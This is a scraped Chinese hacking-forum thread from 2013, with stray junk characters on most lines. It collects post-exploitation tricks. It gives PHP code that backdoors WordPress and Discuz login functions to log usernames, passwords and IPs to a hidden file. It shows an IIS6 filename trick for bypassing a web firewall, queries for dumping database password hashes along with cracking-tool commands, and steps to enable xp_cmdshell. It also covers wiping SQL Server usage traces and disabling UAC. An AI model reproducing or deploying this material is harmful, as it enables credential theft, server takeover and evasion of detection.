当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
) p/ [" K8 b* i1 {" H就是搜索case ‘login’
) L3 ~4 m. Y0 Z1 E# r1 L a在它下面直接插入即可,记录的密码生成在pwd.txt中,
; M. h& f$ x/ b其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
3 c, m" g A0 n利用II6文件解析漏洞绕过安全狗代码:+ L. ~* O0 {! X7 @- ]
;antian365.asp;antian365.jpg5 r$ h' i9 d0 l9 ]
$ `$ [' ~2 c- C, r
各种类型数据库抓HASH破解最高权限密码!
7 D T! A3 S5 ~/ [$ h1.sql server2000
, S1 f( r, {: d6 f, T4 ?9 z6 }& nSELECT password from master.dbo.sysxlogins where name='sa'
5 X, l# J2 o4 R0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503415 H9 N3 g/ v" K4 ~
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
8 b( y+ v7 O6 L7 h6 _$ r/ ?* g/ h
7 [5 _* o* H& K* G+ L0×0100- constant header% W5 b8 a" u9 L" R
34767D5C- salt
. D- f; |+ b- K3 _0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash0 b& F8 ^% X7 N; F* \' D! y9 Z
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
9 }) E: ]/ m, p' n* wcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash" n+ ?+ z+ E/ C1 T" C
SQL server 2005:-
8 F9 e; o* n R- E0 t* QSELECT password_hash FROM sys.sql_logins where name='sa'
' Y( }' d! x1 Y& \+ s; Y Z0 b0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
& I' E' o+ d6 C) p! Q2 Z0×0100- constant header( W' U3 C# E7 h( V
993BF231-salt
( b, r$ _+ s: [7 ^( Z9 M8 J5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash. `8 q2 g$ o e: P0 M% J
crack case sensitive hash in cain, try brute force and dictionary based attacks.9 C2 h, u; y5 k" d
% ~1 n& v+ _4 ?2 B/ N; iupdate:- following bernardo’s comments:-
6 t9 c7 f* ~$ v( l6 Iuse function fn_varbintohexstr() to cast password in a hex string.
& z3 x4 S' s" fe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins0 n l: ^: K: n- ^$ w7 P, U
. o4 A8 i$ p. P1 R7 Y! x
MYSQL:-5 a% V9 m" ~1 |2 V3 Y$ e7 f
6 {4 G! I$ C9 Q, W7 j5 |, D8 |7 V2 U
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
; o8 y7 P, P7 B- _& O6 p) k8 N. f+ u! t
*mysql < 4.12 \. z7 f8 Q& c( x6 ^ Z
l: Q5 e: U. R
mysql> SELECT PASSWORD(‘mypass’);
_1 X: ]+ F; e5 C2 J+ W+——————–+
# U/ ] o. }8 z1 F( P% _8 g4 C| PASSWORD(‘mypass’) |
1 d2 S! p2 C- `' A" }+——————–+% n9 S* p# m9 D; P
| 6f8c114b58f2ce9e |* [/ g% K# r% R$ |2 v" |
+——————–+, x8 X7 F5 f+ I
% X ~) ^2 D) ^' P; A9 d3 }3 ]
*mysql >=4.1( V$ N' R3 c% k, {5 d
. p m7 u/ S, t5 W. J8 l. l9 e1 J
mysql> SELECT PASSWORD(‘mypass’);' Y4 q) F9 [ _4 [: v
+——————————————-+
; j9 H& v! ^5 ^. }| PASSWORD(‘mypass’) |
% B5 r/ w6 R# N1 Y+——————————————-+
- O2 J e& \' O. g: p# w| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
1 F& _% Z+ q$ `. N1 C3 \* V( c0 M+——————————————-+
) _1 r, S! W4 @3 B' }# `1 _) \+ P7 M7 n {) s; k; C/ D
Select user, password from mysql.user M" d% |+ M6 R) f& |) P. Z
The hashes can be cracked in ‘cain and abel’! x7 X2 `! J! z7 s2 Q; g
1 l. E6 M: x5 y9 s
Postgres:-
) p6 U0 r4 h' g1 b& d& W( ]Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
9 W' Y# y) [: N# @& F% Zselect usename, passwd from pg_shadow; C& F0 M1 P; A1 F; A
usename | passwd1 D1 o1 {" k% O
——————+————————————-# H. `; ^" ^& ]2 R) L$ ?
testuser | md5fabb6d7172aadfda4753bf0507ed43960 o" P+ Q0 k* F0 R% A& ?
use mdcrack to crack these hashes:-% X$ F& d4 Q- b4 Q, n0 `
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43960 C+ o( E/ o" Z, f3 j5 }; }
" v7 D6 a8 W( t8 P3 S! p
Oracle:-; @) s7 m _/ u, w- J( g2 C) u
select name, password, spare4 from sys.user$% X5 w2 ?! l( w! d9 n8 @ [
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
# ]7 O: j s) Z+ j, y) l& N1 BMore on Oracle later, i am a bit bored….
# {& \% T, i0 A! S, \$ g. ~
6 O4 }. J" q* G/ M6 u/ n9 }
6 \6 ^+ z* ]# j在sql server2005/2008中开启xp_cmdshell
9 P0 b- K" b3 H q- n. f/ x! G. W-- To allow advanced options to be changed.
- `+ E) i s F% m# M# xEXEC sp_configure 'show advanced options', 1$ f2 _9 x6 ~3 ^6 Y
GO
% O) {! l* z* ^9 w-- To update the currently configured value for advanced options.: S1 z6 |+ U% |/ I* m1 h; X
RECONFIGURE
( n2 J G+ [* o" Z+ GGO0 R4 T' l0 O% A% }) k
-- To enable the feature.* q3 O2 L4 K4 o8 ~
EXEC sp_configure 'xp_cmdshell', 1
. {9 L0 M7 ?8 ?; W/ mGO+ P4 X% W8 U! H1 T3 i) ~; P- I! q
-- To update the currently configured value for this feature./ j. {5 \9 |3 Y: ]4 f- @
RECONFIGURE
' E$ T2 W& l# Y/ SGO }9 x) z) q- ]' @4 H
SQL 2008 server日志清除,在清楚前一定要备份。: C. m! n! _* `+ j' s
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
" j4 O6 [; @- F5 m1 Q" @# zX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin+ L" g4 C3 J2 m
" e2 a- ~6 {' k对于SQL Server 2008以前的版本:3 X# V3 \( x5 j5 E
SQL Server 2005:% i& Q1 s9 k3 D9 n, G
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
0 l7 R+ K. R# z( ZSQL Server 2000:+ H9 ]8 D6 q2 e; k
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。, ?7 z5 I0 `$ Q( V" O* b& @$ C) m
4 W! Z; E/ x: h; u
本帖最后由 simeon 于 2013-1-3 09:51 编辑% i6 b* y6 C8 S* ~# E
; k) u9 S# a4 s, I' w# [' ?
$ f& H' I. }/ L) `; Dwindows 2008 文件权限修改/ c; W( j" ]' U/ q# d7 J
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
4 e, y7 C, p. N" p- p0 s& l2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
( f& P. b& q7 L4 d8 }! S一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,! C4 W; V$ C4 K+ ?. ^# n" }
8 h% w- S0 W" F' `6 N2 kWindows Registry Editor Version 5.00$ \3 M3 G: P' ^5 T, M. G$ P
[HKEY_CLASSES_ROOT\*\shell\runas]
5 c7 ^: S" n/ R# O: e) h@="管理员取得所有权"' s6 |& ^' o4 @3 ~8 G
"NoWorkingDirectory"=""1 P" d3 l2 N* }4 s R
[HKEY_CLASSES_ROOT\*\shell\runas\command]* E! F B% y8 H; S( _1 R, Z) ]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" J* N6 {# {6 I6 j' t u' ^2 C
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 Y2 ? L9 w9 I
[HKEY_CLASSES_ROOT\exefile\shell\runas2]$ h' \9 `, z7 ~# ~5 z# h9 }
@="管理员取得所有权"
- v$ y0 R. R' R# L7 H"NoWorkingDirectory"=""% x5 i7 C% g7 j" h, D% b
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]$ I' q% o' O/ i* a! ]$ E4 p
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" e& ]! h6 B$ D4 c; S$ n8 ?"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 A I& M" u4 Q' \' m
' D( \- P8 r0 Y3 p }[HKEY_CLASSES_ROOT\Directory\shell\runas]
3 I3 d$ w$ Q* I1 O! \# t@="管理员取得所有权"4 w" |$ z) F! [
"NoWorkingDirectory"=""+ A5 U; m' F% [1 L7 o3 D
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
2 k3 C+ l8 W& O$ O/ U* T k@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t") K, F+ d, u. y7 n9 N' V+ l( D
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"/ y; u) A: n+ s) T! G6 D
$ I8 v3 Y1 B7 I1 j O
; e0 T2 `" D" B% z
win7右键“管理员取得所有权”.reg导入
: i' G; g2 {6 C二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,& r, N" b, t4 J+ u8 _/ U+ G
1、C:\Windows这个路径的“notepad.exe”不需要替换
/ D" J u+ K% T0 K% }% F7 v6 G2、C:\Windows\System32这个路径的“notepad.exe”不需要替换4 }' w2 _0 p# W/ L
3、四个“notepad.exe.mui”不要管, u M- R+ m. b" J8 T+ q
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和: f4 T5 s B% b
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
9 s; f8 p& E$ m( b0 ~: e替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,0 O; f! C1 Q# [# r. u y& Z! x
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。9 ^3 z$ S; T0 M3 r+ I& k7 [
windows 2008中关闭安全策略:
- J* x) F+ g r3 u( j! {; xreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- I# t Z3 H' h6 W修改uc_client目录下的client.php 在& v& X5 m2 j# e1 ]
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {' Q& k7 ]1 O: H" v5 I" u
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php. Q% ~2 l8 b: r& n
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
! b( q: Y3 S( S% V: b4 I1 Mif(getenv('HTTP_CLIENT_IP')) {
; P U0 q6 a+ N" C$onlineip = getenv('HTTP_CLIENT_IP');
- a9 U7 F" t3 ~' @& K! R ?} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
9 ~; F, a% Z( _* q D8 G0 C8 g# F$onlineip = getenv('HTTP_X_FORWARDED_FOR');
; X2 Z M( V& r! a% i1 V} elseif(getenv('REMOTE_ADDR')) {
( ?+ J. ]3 f8 p. S+ [$onlineip = getenv('REMOTE_ADDR');
' a7 k% R) Q+ L0 f$ a5 X2 I! q} else {% s- J( C' m0 M" k8 W
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+ l& p$ W' A* l( ~& v}; ?) H3 ? g8 |2 t% ]. b. ^
$showtime=date("Y-m-d H:i:s");6 o1 N, G% [8 o. I9 k0 I
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
9 \" W3 i) N( D! T $handle=fopen('./data/cache/csslog.php','a+');
$ Z+ `3 k) F+ E4 j; _5 ?( s6 i& c $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对